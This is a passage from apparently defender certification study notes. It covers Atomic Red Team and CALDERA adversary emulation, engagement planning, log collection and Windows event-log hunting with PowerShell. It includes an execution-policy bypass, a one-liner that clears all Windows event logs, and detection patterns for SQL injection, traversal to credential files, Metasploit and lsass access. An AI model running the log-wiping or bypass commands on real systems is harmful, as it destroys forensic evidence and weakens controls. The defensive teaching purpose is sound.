return 0 for success.
get_prereq_command: - Commands that fulfil this
prerequisite, or a message describing how to meet
the requirement.
executor
name: Name of the Executor; similar to what has
been discussed above.
command: Exact command to emulate the technique.
cleanup_command: Commands for cleaning up the
previous atomic test, such as deletion of files or
reverting modified configurations.
elevation_required: A boolean value that dictates
whether admin privileges are required.
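Tying the fields above together, a minimal atomic test file might look like the sketch below. This is illustrative only: the GUID, input argument, and command are made up for the example and are not an actual atomic from the project.

```yaml
# Illustrative skeleton using the fields described above
attack_technique: T1127
display_name: Trusted Developer Utilities Proxy Execution
atomic_tests:
  - name: Compile JScript source with jsc.exe
    auto_generated_guid: 00000000-0000-0000-0000-000000000000
    description: |
      Uses the .NET JScript compiler to build an executable from a script.
    supported_platforms:
      - windows
    input_arguments:
      filename:
        description: Path of the JScript file to compile
        type: path
        default: PathToAtomicsFolder\T1127\src\example.js
    executor:
      name: command_prompt
      command: |
        jsc.exe #{filename}
      elevation_required: false
```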
Invoke-AtomicRedTeam
Invoke-AtomicRedTeam is a PowerShell module
created by the same author (Red Canary) that allows
Security Analysts to run simulations defined by
Atomics. To avoid confusion: the primary cmdlet
used in this module is   Invoke-AtomicTest , not
Invoke-AtomicRedTeam .
Setup steps
After downloading and cloning the module, execute the
command below to bypass the PowerShell execution policy:

 PS C:\Users\Administrator> powershell -ExecutionPolicy Bypass
Import the module
 PS C:\Users\Administrator> Import-Module
 "C:\Tools\invoke-atomicredteam\Invoke-
 AtomicRedTeam.psd1" -Force
Verify its working
 PS C:\Users\Administrator> help Invoke-
 AtomicTest
Steps to conduct security testing and threat emulation
with Invoke-AtomicRedTeam
Before executing any technique found in the atomics
directory, it's always recommended to get first-hand
information about how the technique works and what
commands it executes:
[1]   -ShowDetailsBrief
 PS C:\Users\Administrator> Invoke-AtomicTest
 T1127 -ShowDetailsBrief
 #output
 PathToAtomicsFolder =
 C:\Tools\AtomicRedTeam\atomics
 T1127-1 Lolbin Jsc.exe compile javascript to exe
 T1127-2 Lolbin Jsc.exe compile javascript to dll
[2]   -ShowDetails
 PS C:\Users\Administrator> Invoke-AtomicTest
 T1127 -ShowDetails
After getting familiar with the technique, you can then
find out whether any prerequisites need to be installed
for the technique to work:
 PS C:\Users\Administrator> Invoke-AtomicTest
 T1127 -CheckPrereqs
 PathToAtomicsFolder =
 C:\Tools\AtomicRedTeam\atomics
 #output
 CheckPrereq's for: T1127-1 Lolbin Jsc.exe
 compile javascript to exe
 Prerequisites met: T1127-1 Lolbin Jsc.exe
 compile javascript to exe
 CheckPrereq's for:      T1127-2 Lolbin Jsc.exe
 compile javascript      to dll
 Prerequisites met:      T1127-2 Lolbin Jsc.exe
 compile javascript      to dll
If the required binaries, files, or scripts do not exist
on the machine, the   -GetPrereqs   parameter can be used.
This parameter automatically pulls the dependencies from
an external resource. It also details which conditions it
is attempting to satisfy and confirms whether each
prerequisite is already met.
 PS C:\Users\Administrator> Invoke-AtomicTest
 T1127 -GetPrereqs
You can then proceed and choose which tests you want to
execute (if the atomic includes more than one test):
 PS C:\Users\Administrator> Invoke-AtomicTest
 T1053.005 -TestNumbers 1,2
To execute all tests in an atomic:
 PS C:\Users\Administrator> Invoke-AtomicTest
 T1053.005
Lastly, cleaning up the footprints left by emulating
different techniques is VERY IMPORTANT. The
Invoke-AtomicRedTeam module can also execute cleanup
commands that revert every change made by the tests.
This is done using the   -Cleanup   parameter.
 PS C:\Users\Administrator> Invoke-AtomicTest
 T1053.005 -TestNumbers 1,2 -Cleanup
TIBER-EU Framework
The Threat Intelligence-based Ethical Red Teaming (TIBER-
EU) is the European framework developed to deliver
controlled, bespoke, intelligence-led emulation testing on
entities and organizations’ critical live production
systems. It is meant to provide a guideline for
stakeholders to test and improve cyber resilience through
controlled adversary actions.
CTID Adversary Emulation Library
The Center for Threat-Informed Defense is a non-profit
research and development organization operated by MITRE
Engenuity. Its mission is to promote the practice of
threat-informed defence. With this mission, they have
curated an open-source adversary emulation plan library,
allowing organisations to use the plans to evaluate their
capabilities against real-world threats.
CALDERA
Definition
CALDERA™ is an open-source framework designed to run
autonomous adversary emulation exercises efficiently. It
enables users to emulate real-world attack scenarios and
assess the effectiveness of their security defences.
Additionally, blue teamers can also use CALDERA to perform
automated incident response actions through deployed
agents. This functionality aids in identifying TTPs that
other security tools may not detect or prevent.
Components
    1. Agents are programs continuously connecting to
       the CALDERA server to pull and execute
       instructions.
    2. Abilities are TTP implementations, which the
       agents execute. Abilities include the commands
       that will be executed, payloads, platforms and
       other references.
    3. Adversaries are groups of abilities that are
       attributed to a known threat group. The adversary
       profile defines which set of abilities will be
       executed, and agent groups determine on which
       agents these abilities will be performed.
    4. Operations run abilities on agent groups.
    5. Plugins provide additional functionality over the
       core usage of the framework.
    6. Planners determine the order in which abilities
       are executed. The atomic planner executes
       abilities in their atomic ordering (as in Atomic
       Red Team); the batch planner executes all
       abilities at once; and the buckets planner
       groups abilities by their ATT&CK tactic and
       executes them bucket by bucket.
Running & Using Caldera
Once you decide the machine on which you want Caldera
installed, you can start and run Caldera using the below
commands on Linux:
 source ../caldera_venv/bin/activate
 python3 server.py --insecure
Note that we have executed
source ../caldera_venv/bin/activate , which indicates that
we are using a Python virtual environment to load all
modules required by CALDERA.
Deploying Agents
To deploy an agent, navigate to the agent's tab by
clicking the agents button in the sidebar. Then select an
appropriate agent from the list based on your target OS.
Next, ensure that the IP Address in the configuration is
set to your CALDERA machine's IP Address, since the default
value is set to   0.0.0.0 .   Doing this will ensure the agent
will communicate back to your CALDERA instance.
Lastly, copy the first set of commands from your CALDERA
instance to establish a reverse-shell agent
via TCP contact and execute them via PowerShell inside
the provided victim server.
Once done, an agent will spawn in the agent tab showing
that the executed PowerShell commands yielded a
successful result.
Choosing an Adversary Profile to Emulate
Navigate to the adversaries tab via the sidebar and use
the search functionality to choose a profile.
Starting an Operation
Navigate to the operations tab via the sidebar and click
Create Operation. Fill up the details and expand the
configuration by clicking Advanced.
You may need to take note of three things when creating
an operation:
     First, you must select the suitable Adversary
     Profile.
     Next, you should select the right group. By
     selecting red, you will only execute the abilities
     using the red agents and prevent running the
     operation on blue agents, if there are any.
     Lastly, the commands will be executed without
     obfuscation.
Once configured, start the operation by clicking Start.
You may observe that the agent executes the list of
abilities individually.
You can also choose to run the abilities one at a time
instead of running everything immediately. The only
difference from the previous setup is that the Run State
is set to Pause on Start instead of Run immediately. With
this configuration, the operation is paused upon start,
and you can use the Run 1 Link feature to execute a
single ability at a time.
Autonomous Incident Response
Dashboard
Response Plugin
The Response plugin is the counterpart of the threat
emulation plugins of CALDERA. It mainly contains
abilities that focus on detection and response
actions. You may view the summary of the response
plugin by navigating to the response tab in the
sidebar.
You may view the abilities available for the plugin by
navigating to the abilities tab and filtering it with the
response plugin, similar to the image below.
    Compared to the adversaries' abilities, which are
    mapped to MITRE ATT&CK Tactics and Techniques, the
    Response plugin abilities are classified into four
    tactics:
   Setup    - Abilities that prepare information, such as
   baselines, that assists other abilities in determining
   outliers.
   Detect      - Abilities that focus on finding suspicious
   behaviour by continuously acquiring information.
   Abilities under this tactic have the Repeatable field
   configured, meaning they will run and hunt as long
   as the operation runs.
   Response       - Abilities that act on behalf of the user
   to initiate actions, such as killing a process,
   modifying firewall rules, or deleting a file.
   Hunt    - Abilities that focus on searching for
   malicious Indicators of Compromise (IOCs) via logs or
   file hashes.
Threat Emulation Steps
   Define Objectives :         The objectives should be
   clearly defined, specific, and measurable.
Research Adversary TTPs :         This step aims to
accurately model the behaviour of the target
adversary so that the emulation team can conduct
the exercise realistically and practically.
Planning the Threat Emulation Engagement :             A
well-defined plan will contain the elements of the
threat emulation process as well as the
following components:
Engagement Objectives: We have seen that the
objectives are defined at the beginning of the
process to understand the need for threat emulation.
Scope: The departments, users and devices upon
which emulation activities are permitted should be
defined explicitly.
Schedule: The dates and times when the activities
should occur and when deliverables are due should be
defined. This helps avoid conflicts between emulation
activities and legitimate business operations.
Rules of Engagement: The acceptable adversary
behavior to be emulated must be planned and
discussed. This also includes mitigation actions for
any high-risk TTPs used during the exercise.
Permission to Execute: Explicit written consent to
conduct the emulation activities must be provided by
sufficient authority from the organization. This helps
avoid acting out independently and risking legal or
criminal problems.
Communication Plan: The emulation team and
organization stakeholders must have a plan to
communicate information concerning the emulation
activities. You need to define the timings,
     communication channels, and any collaboration
     efforts to be included.
      Conducting the Emulation :        This step involves
     carrying out the attack using the TTPs identified in
     the research phase.
      Concluding and Reporting :        Once results have
     been obtained, the teams must document and report
     the findings. Documentation provides empirical
     evidence to demonstrate the cyber security
     effectiveness of the process.
Module 3: Log Analysis
Essentials
Understanding Logs
Premise
Following security best practices, it is typical for a
modern environment to employ log forwarding. Log
forwarding means that the SOC will move or "forward"
logs from the host machine to a central server or indexer.
Even if an attacker deletes logs from the host machine,
copies may already have been forwarded off the device and
secured.
Log entries are often given a severity level to categorize
and communicate their relative importance or impact.
These severity levels help prioritize responses,
investigations, and actions based on the criticality of the
events. Different systems might use slightly different
severity levels, but commonly, you can expect to find the
following increasing severity levels: Informational,
Warning, Error, and Critical.
Log Files
Log files are records of events committed to a file in a
list format. They can include all sorts of information about
events that happened at a particular time. Every device on
the network creates log files, thus giving you a history of
what's been happening.
Logs typically contain five key fields. They are:
     Timestamp – the time of the event.
     Log level – how severe or important the event is.
     Username – who caused the event.
     Service or application – what caused the event.
     Event description – what has happened.
     Log file types
      Event log    – records information about network
     traffic usage and tracks login attempts,
     application events, and failed password attempts.
      System log      (or syslog) – records operating system
     events, including startup messages, system
     changes, shutdowns, and errors and warnings.
      Server log      – contains a record of activities in a
     text document related to a specific server over a
     specific period of time.
      Change log      – lists changes made to an application
     or file.
      Availability log       – tracks uptime, availability,
     and system performance.
      Authorization and access log          – lists who is
     accessing applications or files.
      Resource log     – provides information on connectivity
     issues and any capacity problems.
      Application log     – messages about specific
     applications, including status, errors, warnings,
     etc.
      Audit log     – activities related to operational
     procedures crucial for regulatory compliance.
      Security log      – security events such as logins,
     permission changes, firewall activity, etc.
      Network log     – network traffic, connections, and
     other network-related events.
      Database log      – activities within a database
     system, such as queries and updates.
      Web server log      – requests processed by a web
     server, including URLs, response codes, etc.
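Putting the common fields together, a log line can be split into the five key fields described earlier. The following is a minimal sketch; the log format, field names, and sample line are illustrative assumptions, not a real system's output.

```python
import re

# Hypothetical log format:
# "2024-01-15T10:32:07 WARNING sshd user=alice Failed password attempt"
LOG_PATTERN = re.compile(
    r"(?P<timestamp>\S+)\s+"      # when the event happened
    r"(?P<level>\w+)\s+"          # severity level
    r"(?P<service>\S+)\s+"        # service or application that caused it
    r"user=(?P<username>\S+)\s+"  # who caused the event
    r"(?P<description>.+)"        # what happened
)

def parse_line(line: str) -> dict:
    """Split one log line into its five fields; empty dict if it doesn't match."""
    match = LOG_PATTERN.match(line)
    return match.groupdict() if match else {}

fields = parse_line("2024-01-15T10:32:07 WARNING sshd user=alice Failed password attempt")
print(fields)
```

In practice every log source has its own layout, so one such pattern is usually written per source before events can be correlated.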
Collecting Logs
The process of log collection relies heavily on the
accuracy of your time settings; therefore, it's
recommended to use the Network Time Protocol (NTP) to
achieve synchronization and ensure the integrity of the
timeline stored in the logs.
You can do so on a Linux system manually by running the
below command
 ntpdate pool.ntp.org
Log collection follows the below steps:
     Source Identification: List all potential log sources,
     such as servers, databases, applications, and
     network devices.
     Choosing a Log Collector: Example is Splunk or
     rsyslog collector or Elastic Stack.
     Configuring Collection Parameters: Ensure that time
     synchronization is enabled through NTP to maintain
     accurate timelines, adjust settings to determine
     which events to log at what intervals, and prioritize
     based on importance.
     Testing: Run a test to ensure logs are appropriately
     collected from all sources.
Example | Log collection using Rsyslog
We can configure Rsyslog to collect specific logs such as
web server logs or ssh logs and forward them to a
specific file.
First ensure Rsyslog is installed on your machine
 sudo systemctl status rsyslog
Next we navigate to the directory where rsyslog stores its
configuration snippets and create a new configuration
file. Note that rsyslog only loads files ending in .conf
from this directory.

 cd /etc/rsyslog.d
 nano apache.conf
Then inside the file, type the below
 $FileCreateMode 0644
 :programname, isequal, "apache"
 /var/log/websrv-02/rsyslog_apache.log
Restart the rsyslog service
 sudo systemctl restart rsyslog
Log Management
Log management includes securely storing logs, providing
sufficient storage capacity, and ensuring swift retrieval
of logs when needed. Also make sure to conform to the
retention period, back up your logs regularly, and conduct
periodic reviews.
Log Retention & Archival
Define log retention policies and implement them. Don't
forget to create backups of stored log data as well.
Log Analysis
Definition
Log analysis examines and interprets log event data
generated by various data sources (devices, applications,
and systems) to monitor metrics and identify security
incidents.
Log analysis involves several steps that start with
collecting, parsing, and processing log files to turn data
into actionable insights. Analysts then correlate log
data to find links and connections between events to
paint a story of what happened.
Creating a Timeline
A timeline is a chronological representation of the logged
events, ordered based on their occurrence. Creating a
timeline is important to construct the series of events
that eventually led to the security incident which can aid
analysis identify the initial point compromise and
understand the attacker's tactics, techniques and
                            229 / 547
                            HTB CDSA
procedures (TTPs).
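At its simplest, building a timeline means merging events from different sources and ordering them by timestamp. The sketch below uses invented event records; the source names and messages are illustrative assumptions.

```python
from datetime import datetime

# Hypothetical events gathered from different log sources.
events = [
    {"time": "2024-01-15 10:35:02", "source": "webserver", "event": "Suspicious POST to /upload.php"},
    {"time": "2024-01-15 10:31:47", "source": "firewall",  "event": "Port scan detected from 203.0.113.7"},
    {"time": "2024-01-15 10:41:19", "source": "auth",      "event": "New admin account created"},
]

# Order events chronologically to reconstruct the series of events.
timeline = sorted(events, key=lambda e: datetime.strptime(e["time"], "%Y-%m-%d %H:%M:%S"))

for e in timeline:
    print(e["time"], e["source"], e["event"])
```

This is also why NTP synchronization matters: if sources disagree on the time, the sorted order no longer reflects what actually happened.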
Looking for patterns of security incidents
Multiple failed login attempts
Unusually high numbers of failed logins within a short time
may indicate a brute-force attack.
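A minimal sketch of this detection: count failed logins per user inside a sliding time window and flag users who exceed a threshold. The records, threshold, and window size are illustrative assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Hypothetical failed-login records: (timestamp, username).
failed_logins = [
    ("2024-01-15 10:30:01", "admin"),
    ("2024-01-15 10:30:03", "admin"),
    ("2024-01-15 10:30:05", "admin"),
    ("2024-01-15 10:30:06", "admin"),
    ("2024-01-15 11:45:00", "bob"),
]

def brute_force_suspects(records, threshold=3, window=timedelta(minutes=1)):
    """Return users with more than `threshold` failures inside any `window`."""
    per_user = defaultdict(list)
    for ts, user in records:
        per_user[user].append(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"))
    suspects = set()
    for user, times in per_user.items():
        times.sort()
        for start in times:
            # count failures inside [start, start + window]
            in_window = [t for t in times if start <= t <= start + window]
            if len(in_window) > threshold:
                suspects.add(user)
    return suspects

print(brute_force_suspects(failed_logins))
```

Real SIEM rules work the same way, only with tunable thresholds per account type and source IP.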
Unusual login times
Login events outside the user's typical access hours
might signal unauthorized access or compromised
accounts.
Geographic anomalies
Login events from IP addresses in countries the user does
not usually access can indicate potential account
compromise or suspicious activity.
In addition, simultaneous logins from different geographic
locations may suggest account sharing or unauthorized
access.
Frequent password changes
Log events indicating that a user's password has been
changed frequently in a short period may suggest an
attempt to hide unauthorized access or take over an
account.
Unusual user-agent strings
In HTTP traffic logs, requests from users with uncommon
user-agent strings that deviate from their typical browser
may indicate automated attacks or malicious activities.
For example, by default, the Nmap scanner will log a user
agent containing "Nmap Scripting Engine."
The Hydra brute-forcing tool, by default, will include
"(Hydra)" in its user-agent. These indicators can be
useful in log files to detect potential malicious
activity.
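The fingerprints above can be checked with a simple substring match. This is a minimal sketch: the marker list mixes the Nmap and Hydra strings mentioned above with an extra illustrative entry (sqlmap), and a real deployment would maintain a much larger list.

```python
# Substrings that identify known scanners/brute-forcers in a user-agent.
# "sqlmap" is an illustrative addition, not from the text above.
SUSPICIOUS_AGENT_MARKERS = ["Nmap Scripting Engine", "(Hydra)", "sqlmap"]

def flag_user_agent(user_agent: str) -> bool:
    """Return True if the user-agent matches a known tool fingerprint."""
    return any(marker.lower() in user_agent.lower() for marker in SUSPICIOUS_AGENT_MARKERS)

print(flag_user_agent("Mozilla/5.0 (compatible; Nmap Scripting Engine)"))  # flagged
print(flag_user_agent("Mozilla/5.0 (Windows NT 10.0; Win64; x64)"))        # not flagged
```

Keep in mind that user-agents are attacker-controlled and trivially spoofed, so this only catches tools left at their defaults.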
Attack Patterns and signatures
SQL Injection
When looking for patterns of SQL Injection, we try to find
evidence of SQL queries in the logs such as UNION SELECT.
Sometimes the SQL Payloads may be URL-encoded,
requiring an additional processing step to identify it
efficiently.
XSS
To identify common XSS attack patterns, it is often
helpful to look for log entries with unexpected or unusual
input that includes script tags and event handlers
(onmouseover, onclick, onerror).
Directory Traversal
To identify common traversal attack patterns, look for
traversal sequence characters (../ and ../../) and
indications of access to sensitive files
(/etc/passwd, /etc/shadow).
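The three attack patterns above can be expressed as regular expressions applied after URL-decoding. This is a minimal sketch, not a complete rule set; the signatures only cover the examples named in the text.

```python
import re
from urllib.parse import unquote

# Signatures drawn from the patterns described above.
SIGNATURES = {
    "sql_injection":       re.compile(r"union\s+select", re.IGNORECASE),
    "xss":                 re.compile(r"<script|onerror\s*=|onmouseover\s*=|onclick\s*=", re.IGNORECASE),
    "directory_traversal": re.compile(r"\.\./|/etc/passwd|/etc/shadow", re.IGNORECASE),
}

def classify(log_line: str):
    """Return the names of all signatures matching a (URL-decoded) log line."""
    decoded = unquote(log_line)  # payloads may be URL-encoded
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

print(classify("GET /item?id=1%20UNION%20SELECT%20password%20FROM%20users"))
print(classify("GET /../../etc/passwd"))
```

Note that the URL-decoding step is what catches the encoded `UNION SELECT` payload; matching the raw line would miss it.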
Windows Logs Analysis
Premise
Almost all event logging capability within Windows is
handled by ETW (Event Tracing for Windows) at both
the application and kernel level.
Event IDs are a core feature of Windows logging. Events
are sent and transferred in XML (Extensible Markup
Language) format, which is the standard for how events
are defined and implemented by providers.
Components of Event Tracing for Windows
ETW is broken up into three separate components, working
together to manage and correlate data. Event logs in
Windows are no different from generic XML data, making
it easy to process and interpret.
From start to finish, events originate from the providers.
Controllers will determine where the data is sent and how
it is processed through sessions. Consumers will save or
deliver logs to be interpreted or analyzed.
Event Controllers       are used to build and configure
sessions. To expand on this definition, we can think of
the controller as the application that determines how and
where data will flow. From the Microsoft docs,
“Controllers are applications that define the size and
location of the log file, start and stop event tracing
sessions, enable providers so they can log events to the
session, manage the size of the buffer pool, and obtain
execution statistics for sessions.”
Event Providers      are used to generate events. To
expand on this definition, the controller will tell the
provider how to operate, then collect logs from its
designated source. From the Microsoft docs, “Providers
are applications that contain event tracing
instrumentation. After a provider registers itself, a
controller can then enable or disable event tracing in the
provider. The provider defines its interpretation of being
enabled or disabled. Generally, an enabled provider
generates events, while a disabled provider does not.”
Event Consumers      are used to interpret events. To
expand on this definition, the consumer will select
sessions and parse events from that session or multiple at
the same time. This is most commonly seen in the “Event
Viewer”. From the Microsoft docs, “Consumers are
applications that select one or more event tracing
sessions as a source of events. A consumer can request
events from multiple event tracing sessions
simultaneously; the system delivers the events in
chronological order. Consumers can receive events stored
in log files, or from sessions that deliver events in real
time.”
Security Log
The Security log functions as an audit log and an
access log. It records auditable events
such as successes or failures. Success indicates an
audited event completed successfully, such as a user
logging on or successfully deleting a file. Failure means
that a user tried to perform an action but failed, such as
failing to log on or attempting to delete a file but receiving
a permission error instead.
Application Log
It records events sent to it by applications or programs
running on the system. Any application has the capability
of writing events in the Application log. This includes
warnings, errors, and routine messages.
System Logs
It records events related to the functioning of the
operating system. This can include when it starts, when it
shuts down, information on services starting and stopping,
drivers loading or failing, or any other system component
event deemed important by the system developers.
Windows Categorization of Event Messages
     Information: Describes the successful operation of a
     driver, application or service. Basically, a service is
     calling home.
     Warning: Describes an event that may not be a
     present issue but can cause problems in the future.
     Error: Describes a significant problem with a service
     or application.
     Success Audit: Outlines that an audited security
     access operation was successful. For example, a
     user’s successful login to the system.
     Failure Audit: Outlines that an audited security
     access operation failed. For example, a failed
     access to a network drive by a user.
Location & Format of Event Logs
The log files' directory can differ according to the
Windows OS version. Microsoft changed the event log file
directory/location with Windows Vista.

 C:\WINDOWS\System32\winevt\Logs

The file format is .evt or .evtx.
Enable success and failure logging
on all categories
You should enable logging on all workstations to be able to
collect and analyze logs. The below command enables
logging for all security and system operations in cases of
both success and failure. Note that this will create very
large log files.
 C:\> auditpol /set /category:* /success:enable
 /failure:enable
The commands below enable success and failure auditing for
the various system and security subcategories.
 C:\> auditpol /set /subcategory:"Detailed File Share" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"File System" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Security System Extension" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"System Integrity" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Security State Change" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Other System Events" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Logon" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Logoff" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Account Lockout" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Other Logon/Logoff Events" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Network Policy Server" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Registry" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"SAM" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Certification Services" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Application Generated" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Handle Manipulation" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"File Share" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Filtering Platform Packet Drop" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Filtering Platform Connection" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Other Object Access Events" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Sensitive Privilege Use" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Non Sensitive Privilege Use" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Other Privilege Use Events" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Process Termination" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"DPAPI Activity" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"RPC Events" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Audit Policy Change" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Authentication Policy Change" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Authorization Policy Change" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"MPSSVC Rule-Level Policy Change" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Filtering Platform Policy Change" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Other Policy Change Events" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"User Account Management" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Computer Account Management" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Security Group Management" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Distribution Group Management" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Application Group Management" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Other Account Management Events" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Directory Service Changes" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Directory Service Replication" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Detailed Directory Service Replication" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Directory Service Access" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Other Account Logon Events" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Kerberos Authentication Service" /success:enable /failure:enable

 C:\> auditpol /set /subcategory:"Credential Validation" /success:enable /failure:enable
Auditing Windows Event Logs from
the command line
The wevtutil.exe utility manages event logs from the
command line

 wevtutil.exe

Requesting the help menu

 wevtutil.exe /?
You can start by copying the event logs into external log
files so that you can investigate them separately. Note
that each log should be exported to its own file so the
backups do not overwrite one another.

 C:\> wevtutil epl Security C:\<BACK UP
 PATH>\security.evtx

 C:\> wevtutil epl System C:\<BACK UP
 PATH>\system.evtx

 C:\> wevtutil epl Application C:\<BACK UP
 PATH>\application.evtx
Auditing the application logs and returning 3 results in
descending order and text format
 wevtutil qe Application /c:3 /rd:true /f:text
Clear all logs
 PS C:\> wevtutil el | Foreach-Object {wevtutil
 cl "$_"}
Investigating Event logs with
PowerShell
Auditing all the logs in the local PC
[1]
 PS C:\> Get-WinEvent -ListLog * | Select-
 Object LogName, RecordCount, IsClassicLog,
 IsEnabled, LogMode, LogType | Format-Table -
 AutoSize
[2]
 PS C:\> Get-Eventlog -list
Auditing log providers
 Get-WinEvent -ListProvider * | Format-Table -
 Autosize
Listing log providers with 'powershell'
as a keyword
 Get-WinEvent -ListProvider *PowerShell
Listing events related to windows
powershell
 Get-WinEvent -ListProvider Microsoft-Windows-
 PowerShell | Format-Table Id, Description
Listing available logs containing given
keyword
 Get-WinEvent -ListLog * | findstr "kw"
Listing events on a specific log path
 Get-WinEvent -FilterHashtable
 @{logname="Microsoft-Windows-
 PrintService/Admin"} | fl -property *
Finding process related information
using a given keyword about the
process
 Get-WinEvent -Path .\file.evtx -FilterXPath
 '*/System/EventID=1' | Sort-Object TimeCreated
 | Where-Object {$_.Message -like "*kw*"} | fl
listing application logs from WLMS
provider and generated at the given
time
Get-WinEvent -LogName Application -FilterXPath
'*/System/Provider[@Name="WLMS"] and
*/System/TimeCreated[@SystemTime="2020-12-
15T01:09:08.940277500Z"]'
Displaying events logged for processes
initiated network connections.
 Get-WinEvent -Path .\file.evtx -FilterXPath
 '*/System/EventID=3' | Sort-Object TimeCreated
 | fl
listing security logs with Sam as target
username and event id equals to 4724

 Get-WinEvent -LogName Security -FilterXPath
 '*/EventData/Data[@Name="TargetUserName"]="Sam"
 and */System/EventID=4724'
listing Windows PowerShell engine logs with
event id equals to 400

 Get-WinEvent -LogName "Windows PowerShell" -
 FilterXPath '*/System/EventID=400'
listing logs from log file with event id =
104 and format as list displaying all
events properties
Get-WinEvent -Path .\merged.evtx -FilterXPath
'*/System/EventID=104' | fl -property *
listing logs from log file with event id =
4104 with string 'ScriptBlockText' and format
as list displaying all events properties

 Get-WinEvent -Path .\merged.evtx -FilterXPath
 '*/System/EventID=4104 and
 */EventData/Data[@Name="ScriptBlockText"]' |
 fl -property *
listing logs from log file with event id =
13 with string 'enc' in the message field and
format as list displaying all events
properties

 Get-WinEvent -Path .\file.evtx -FilterXPath
 '*/System/EventID=13' | Sort-Object
 TimeCreated | Where-Object {$_.Message -like
 "*enc*"} | fl
filtering events using time range

 $from = Get-Date -Date "date"
 $to = Get-Date -Date "date"
 Get-WinEvent -Path .\file.evtx -FilterXPath
 '*/System/*' | Where-Object { $_.TimeCreated -
 ge $from -and $_.TimeCreated -le $to } |
 Sort-Object TimeCreated

 $a = Get-Date -Date "date"
 Get-WinEvent -Path .\file.evtx -FilterXPath
 '*/System/*' | Where-Object { $_.TimeCreated -
 like $a } | fl
listing security logs with event id equals
to 4799
PS C:\> Get-WinEvent -LogName Security -
FilterXPath '*/System/EventID=4799'
Listing accounts validation logs in the
last 10 days

 PS C:\> Get-Eventlog Security 4768,4771,4772,4769,4770,4649,4778,4779,4800,4801,4802,4803,5378,5632,5633 -after ((get-date).addDays(-10))
Auditing accounts logged on/off in the
last two days
 PS C:\> Get-Eventlog Security 4625,4634,4647,4624,4625,4648,4675,6272,6273,6274,6275,6276,6277,6278,6279,6280,4649,4778,4779,4800,4801,4802,4803,5378,5632,5633,4964 -after ((get-date).addDays(-2))
Auditing access to file shares, file
system, SAM and registry in the last
two days
 PS C:\> Get-EventLog Security 4671,4691,4698,4699,4700,4701,4702,5148,5149,5888,5889,5890,4657,5039,4659,4660,4661,4663,4656,4658,4690,4874,4875,4880,4881,4882,4884,4885,4888,4890,4891,4892,4895,4896,4898,5145,5140,5142,5143,5144,5168,4664,4985,5152,5153,5031,5150,5151,5154,5155,5156,5157,5158,5159 -after ((get-date).addDays(-2))
Auditing the use of privilege
 PS C:\> Get-EventLog Security 4672,4673,4674 -
 after ((get-date).addDays(-1))
Auditing system changes and integrity
events
 PS C:\> Get-Eventlog Security 5024,5025,5027,5028,5029,5030,5032,5033,5034,5035,5037,5058,5059,6400,6401,6402,6403,6404,6405,6406,6407,4608,4609,4616,4621,4610,4611,4614,4622,4697,4612,4615,4618,4816,5038,5056,5057,5060,5061,5062,6281 -after ((get-date).addDays(-1))
Detecting the use of psexec
Get-WinEvent -FilterHashTable
@{Logname='System';ID='7045'} | where
{$_.Message.contains("PSEXEC")}
Investigating Logs with Sysmon and
Powershell
Hunting for Metasploit events
Get-WinEvent -Path .\Filtering.evtx -
FilterXPath '*/System/EventID=3 and
*/EventData/Data[@Name="DestinationPort"] and
*/EventData/Data=4444'
Filtering for Network connections
Get-WinEvent -Path .\Filtering.evtx -
FilterXPath '*/System/EventID=3'
Filtering for Network connections in
format list with maximum quantity of
one
 Get-WinEvent -Path .\Filtering.evtx -
 FilterXPath '*/System/EventID=3' -MaxEvents 1
 -Oldest | fl -property *
Filtering for process access events
specifically lsass.exe
 Get-WinEvent -Path <Path to Log> -FilterXPath
 '*/System/EventID=10 and
 */EventData/Data[@Name="TargetImage"] and
 */EventData/Data="C:\Windows\system32\lsass.ex
 e"'
Filtering for Alternate Data Streams
events
 Get-WinEvent -Path <Path to Log> -FilterXPath
 '*/System/EventID=15'
